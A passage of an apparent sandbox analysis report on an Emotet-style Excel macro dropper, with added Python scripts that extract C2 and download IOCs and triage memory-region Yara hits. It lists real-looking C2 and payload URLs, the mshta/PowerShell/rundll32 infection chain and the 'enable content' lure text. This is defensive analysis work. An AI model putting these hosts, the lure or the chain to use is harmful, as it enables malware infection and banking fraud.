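Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEe
Source: DOCUMENT_2801.xls.0.drString found in binary or memory: http://91.240.118.172/ee/ss/se.html
Source: mshta.exe, 00000006.00000003.428385382.000000000405D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
""".splitlines()

C2_RE = re.compile(r"extractorIPs:\s*(\d{1,3}(?:\.\d{1,3}){3}):(\d+)")
CONN_RE = re.compile(r"TCP traffic:\s*\S+\s*->\s*(\d{1,3}(?:\.\d{1,3}){3}):(\d+)")
URL_RE = re.compile(r"String found in binary or memory:\s*(https?://\S+)")
# Assumed noise: CRL/OCSP responders, the trusted-root CAB host, CA policy pages and
# placeholder hostnames baked into system DLLs. Extend from your own clean-process dumps.
NOISE_HOST_RE = re.compile(
    r"^(crl|ocsp|ctldl)\.|^secure\.comodo\.com$|^servername$|digicert|diginotar|entrust|globalsign")


def _strip_scanner_junk(url):
    # The string scanner runs past the URL's terminator and glues adjacent bytes on.
    # 'PE3' is the suffix on this report's PowerShell strings (assumed junk). ASN.1 tails
    # such as '0', '06' or '0D' only occur on certificate URLs, which are dropped anyway.
    return url[:-3] if url.endswith("PE3") else url


def _drop_truncated(urls):
    """Keep a string only if it is not a strict prefix of another one: memory scans report
    the same URL cut at several lengths ('http://3-fasen.c', ...)."""
    kept = []
    for u in sorted(set(urls), key=len, reverse=True):
        if not any(k.startswith(u) for k in kept):
            kept.append(u)
    return sorted(kept)


def _is_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def extract_iocs(lines):
    c2, connections, urls = set(), set(), []
    for line in lines:
        if m := C2_RE.search(line):
            c2.add(f"{m[1]}:{m[2]}")
        elif m := CONN_RE.search(line):
            connections.add(f"{m[1]}:{m[2]}")
        elif m := URL_RE.search(line):
            urls.append(_strip_scanner_junk(m[1]))
    buckets = {"c2": sorted(c2), "connections": sorted(connections),
               "download_urls": [], "ip_urls": [], "bare_hosts": [], "noise": []}
    for url in _drop_truncated(urls):
        parts = urlsplit(url)
        host = parts.hostname or ""
        if NOISE_HOST_RE.search(host):
            buckets["noise"].append(url)
        elif _is_ip(host):
            buckets["ip_urls"].append(url)
        elif parts.path in ("", "/"):
            buckets["bare_hosts"].append(url)  # no path: low confidence, often environment noise
        else:
            buckets["download_urls"].append(url)
    # Connections the sandbox actually made that are not in the extracted config deserve a
    # second look: C2 the extractor missed, or entries outside the excerpt of the list.
    buckets["unlisted_connections"] = sorted(connections - c2)
    return buckets


if __name__ == "__main__":
    import json
    print(json.dumps(extract_iocs(SAMPLE_LINES), indent=2))
```

Strings that survive the noise filter but carry no path (www.protware.com here, and the www.piriform.com/ccleaner or LinkedIn strings elsewhere in this report) are kept in a separate low-confidence bucket rather than dropped, because they are as likely to come from the analysis VM as from the sample; blocking them would be a mistake, and so would silently discarding them.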

                            E-Banking Fraud

                            Source: Yara match | File source: 17.2.rundll32.exe.27d0000.7.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.25b0000.9.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.3090000.27.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2f70000.23.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 13.2.rundll32.exe.3c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2880000.9.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.880000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2db0000.19.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.2760000.8.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.860000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2a90000.12.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.370000.2.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.2e10000.13.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 13.2.rundll32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.2730000.7.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2db0000.19.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.e80000.7.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.7d0000.2.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.d80000.5.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.e50000.6.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2eb0000.21.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.2900000.11.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.2db0000.13.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.29a0000.12.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2f70000.23.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2800000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2b30000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.8b0000.4.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.e50000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.c20000.3.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 11.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.810000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.730000.1.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2900000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.8e0000.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 13.2.rundll32.exe.600000.1.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2900000.10.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 16.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.370000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2fc0000.24.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.860000.4.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2800000.8.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.29a0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 11.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.ce0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.880000.3.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.27d0000.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2e40000.20.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.2800000.10.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.27d0000.9.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2fc0000.24.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.2e90000.15.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2b00000.13.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.28d0000.10.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2d50000.17.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2a90000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.28d0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.2e40000.14.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2eb0000.21.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2d80000.18.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.700000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.830000.3.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2d10000.16.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.2730000.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.3030000.25.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 11.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.810000.2.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.2cf0000.12.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.3060000.26.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.7d0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.2830000.11.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2d50000.17.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2b60000.15.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.27a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2b30000.14.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.2830000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2a10000.11.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.26d0000.5.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.700000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.2400000.8.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.26a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.ce0000.4.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2d10000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.8e0000.5.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.2ee0000.22.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.2400000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 14.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 17.2.rundll32.exe.10000000.31.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 12.2.rundll32.exe.2db0000.13.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.510464737.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000E.00000002.559443936.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.510287777.00000000026A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.665343860.0000000003091000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000E.00000002.559926602.0000000000E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000E.00000002.559812770.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.664505889.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000010.00000002.562101992.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.510322311.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.664861198.0000000002DB0000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.664965956.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.664542338.0000000002B61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000E.00000002.560189924.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000E.00000002.559719503.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.510432409.0000000002830000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.663059849.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.510167906.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.665031499.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.510522270.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000B.00000002.443244837.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.668746611.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000D.00000002.516180172.0000000000601000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000E.00000002.560022976.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.663136022.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.664371125.0000000002A11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000D.00000002.515850446.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.664216814.0000000002800000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.665264578.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000E.00000002.560265506.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.510145612.00000000008B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.663107682.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.509996233.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000E.00000002.559589643.0000000000291000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000E.00000002.560140675.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.664407337.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000E.00000002.560066037.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.664117517.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.664190998.00000000027D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000E.00000002.559766532.0000000000C21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.510607759.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.510494175.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.664248445.0000000002881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.665204361.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.664471765.0000000002B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.665308751.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.510409215.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.664297781.0000000002900000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.663687755.0000000000831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.510379453.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000010.00000002.562204420.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.664663684.0000000002D10000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.663778840.0000000000860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.664161641.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.510352151.0000000002761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.665168076.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000D.00000002.516839554.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.665088679.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.510556451.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.510119980.0000000000880000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000E.00000002.559961394.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000010.00000002.562837454.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000E.00000002.559901253.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000E.00000002.560096641.0000000002901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000E.00000002.559852842.0000000000D81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000011.00000002.664763356.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: C:\ProgramData\Milossd.dll, type: DROPPED
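Reading the Yara match list above by hand is tedious: each "File source" is either a Joe Sandbox unpacked-PE name (pid.stage.process.base.index[.raw].unpack), a memory-dump name (eight dotted fields ending in .sdmp) or a dropped-file path. The following Python is an added example, not part of the Joe Sandbox report, that parses those identifiers and groups the hits per process into "module loaded from disk" versus "executable private memory" (the unpacked Emotet payload). Two things are assumptions: the fifth and seventh fields of an .sdmp name are treated as Win32 PAGE_* protection and MEM_* type values because the numbers seen in this report (0x20, 0x40, 0x20000, 0x1000000) match those constants exactly, and 0x10000000 is treated as the default DLL ImageBase; neither interpretation is documented on the page. The sample rows are copied from the list above and the parser accepts the row with or without a separator after "Yara match".

```python
import re
from collections import Counter, defaultdict

# Win32 memory constants from winnt.h. Mapping .sdmp fields 5 and 7 onto them is an
# inference from the values seen in this report, not something the report documents.
PAGE_PROTECT = {0x02: "R", 0x04: "RW", 0x10: "X", 0x20: "RX", 0x40: "RWX", 0x80: "WCX"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
DEFAULT_DLL_BASE = 0x10000000  # classic default ImageBase for DLLs (assumption for classification)

ROW_RE = re.compile(r"File source:\s*(?P<src>.+?),\s*type:\s*(?P<type>\w+)\s*$")
UNPACK_RE = re.compile(
    r"^(?P<pid>\d+)\.(?P<stage>\d+)\.(?P<proc>.+?\.exe)\.(?P<base>[0-9a-fA-F]+)"
    r"\.(?P<idx>\d+)\.(?P<raw>raw\.)?unpack$")
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)"
    r"\.(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})"
    r"\.(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$")

# Constructed sample: seven rows copied from the Yara match list of this report.
SAMPLE_ROWS = """\
Source: Yara match | File source: 17.2.rundll32.exe.27d0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.880000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.510607759.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.664861198.0000000002DB0000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\\ProgramData\\Milossd.dll, type: DROPPED
""".splitlines()


def parse_source(src):
    """Describe one 'File source' value: unpacked PE, memory dump, or plain file path."""
    m = UNPACK_RE.match(src)
    if m:
        return {"kind": "unpack", "pid": int(m["pid"]), "process": m["proc"],
                "base": int(m["base"], 16), "raw": bool(m["raw"]), "prot": None, "mtype": None}
    m = SDMP_RE.match(src)
    if m:  # pid is hexadecimal here (0x11 == 17), unlike the .unpack form
        return {"kind": "sdmp", "pid": int(m["pid"], 16), "process": None,
                "base": int(m["base"], 16), "raw": False,
                "prot": PAGE_PROTECT.get(int(m["prot"], 16), m["prot"]),
                "mtype": MEM_TYPE.get(int(m["mtype"], 16), m["mtype"])}
    return {"kind": "file", "pid": None, "process": None, "base": None,
            "raw": False, "prot": None, "mtype": None, "path": src}


def classify(region):
    """Heuristic triage of where a Yara hit lives."""
    if region["kind"] == "file":
        return "dropped-file"
    if region["mtype"] == "MEM_IMAGE":
        return "mapped-image"        # section of a module loaded from disk (the dropped DLL)
    if region["mtype"] == "MEM_PRIVATE" and region["prot"] in ("RX", "RWX"):
        return "private-exec"        # executable memory with no file backing: unpacked/injected code
    if region["kind"] == "unpack":
        return ("unpacked-pe-default-dll-base" if region["base"] == DEFAULT_DLL_BASE
                else "unpacked-pe")  # Joe Sandbox's reconstructed PE from a private region
    return "other"


def summarize(rows):
    """Count hit classes per process id; dropped files are keyed under 'dropped'."""
    per_pid = defaultdict(Counter)
    for row in rows:
        m = ROW_RE.search(row)
        if not m:
            continue
        region = parse_source(m["src"])
        key = region["pid"] if region["pid"] is not None else "dropped"
        per_pid[key][classify(region)] += 1
    return dict(per_pid)


if __name__ == "__main__":
    for key, counts in sorted(summarize(SAMPLE_ROWS).items(), key=str):
        print(f"{key}: {dict(counts)}")
```

Run against the full list, the per-process counts show the pattern worth noting in a triage write-up: every rundll32 instance (PIDs 11 to 17) carries one MEM_IMAGE hit at the 0x10000000 default DLL base, which is the dropped Milossd.dll itself, plus a series of private RX/RWX regions, which is the payload the loader unpacked at runtime.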

                            System Summary

                            Source: DOCUMENT_2801.xls | Macro extractor: Sheet: Macro3 contains: mshta
                            Source: DOCUMENT_2801.xls | Macro extractor: Sheet: Macro3 contains: mshta
                            Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
                            Source: Screenshot number: 4 | Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 Previewing is not available for protected documents. 14 15 Yo
                            Source: Screenshot number: 4 | Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
                            Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Screenshot number: 8 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. :: 18 19 20 21 22 23
                            Source: Screenshot number: 8 | Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 ,, Previewing is not available for protected documents. L, 14
                            Source: Screenshot number: 8 | Screenshot OCR: protected documents. L, 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to
                            Source: Screenshot number: 8 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. :: 18 19 20 21 22 23 24 25 26 27 28 2
                            Source: DOCUMENT_2801.xls | Stream path 'Workbook': raw BIFF Workbook stream dump (non-printable bytes rendered as dots). Legible content: the WRITEACCESS (last-saved-by) user name "xXx" at the start of the stream, a run of FONT records for Calibri and Calibri Light, and accounting number-format strings (_-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_- and its #,##0.00 variant, plus [Red] negative forms); the remainder of the dump is non-printable.
                            Source: DOCUMENT_2801.xls.0.dr | Stream path 'Workbook': same Workbook stream dump for the re-saved copy; the visible text is identical except that the WRITEACCESS user name reads "user" instead of "xXx".
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\Milossd.dll (Jump to dropped file)
                            Source: DOCUMENT_2801.xls | Initial sample: EXEC
                            Source: DOCUMENT_2801.xls | Initial sample: EXEC
